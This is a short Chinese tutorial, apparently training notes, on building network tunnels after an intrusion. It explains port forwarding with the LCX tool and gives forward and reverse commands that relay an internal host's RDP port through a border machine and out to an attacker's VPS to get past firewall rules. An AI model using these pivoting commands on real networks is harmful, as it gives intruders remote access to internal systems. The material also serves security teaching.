攻击流程

为什么需要建立通信隧道？

当攻击者找到合适的口子后，便可以将这个点作为从外网进入内网的根据地，此时可以在这个点上建立隧道，形成从外网到内网的跳板。

什么是端口转发？

端口转发(Port forwarding)，有时被叫做隧道，端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为。
简单来说就是将一个端口收到的流量转发到另一个端口。

端口转发工具——LCX

lcx是最为经典的端口转发工具，基于Socket套接字实现端口转发
有Windows和Linux两个版本，分别为lcx.exe 和 portmap

LCX——正向连接

? 将内网靶机的3389端口转发到边界机的8888端口
? 命令：lcx.exe -tran 8888 靶机ip 3389

lcx.exe -tran 8888 192.168.11.12 3389  

? 场景：由于防火墙限制，只允许8888入站

连接测试

LCX——反向连接

? 将内网靶机的3389端口转发到攻击机的8888端口
? 攻击机（vps）：

lcx.exe -listen 6666 8888  

? 边界机：

lcx.exe -slave 192.168.7.144 6666 192.168.11.12 3389  

连接测试